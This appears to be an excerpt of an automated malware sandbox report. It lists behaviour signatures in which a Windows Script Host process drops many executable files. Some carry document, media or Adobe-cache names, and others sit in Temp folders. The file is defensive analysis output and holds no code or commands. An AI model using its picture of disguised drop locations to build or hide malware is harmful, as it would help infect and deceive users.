    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindow / User API: foregroundWindowGot 712
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EOWRVPQCCS.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1206337459Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\TQDFJHPUIU.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpD567.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5713452101.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctB04C.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0982390758.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0409654664.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\BUG32\ad.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9422479677.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6577738837.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1927994670.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7245361316.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EFOYFBOLXA.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\offline.session64Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0409654664Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Reddit.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8784112376.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2103954313.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6183211589.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\CookiesJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5809130301.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0982390758Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EIVQSAOTAQ.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EFOYFBOLXA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7011884383.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1239919175.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Links\Downloads.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1546.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMailJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2385760553.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6422942404.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0164771190Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLinkJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1141274626Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-msJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1550.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EWZCVGNOWT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3322604653.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1033868256.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1547.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.sesJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\offline.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocsJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\NYMMPCEIMA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\DUUDTUBZFW.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9217021447.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\GRXZDKKVDB.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6750529025.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7457734050.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6109303877.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EWZCVGNOWT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited LinksJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8351801105.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent StateJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4736274156.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.datJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9925478147.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2265332024.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7216804956.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1445a.exeJump to dropped file
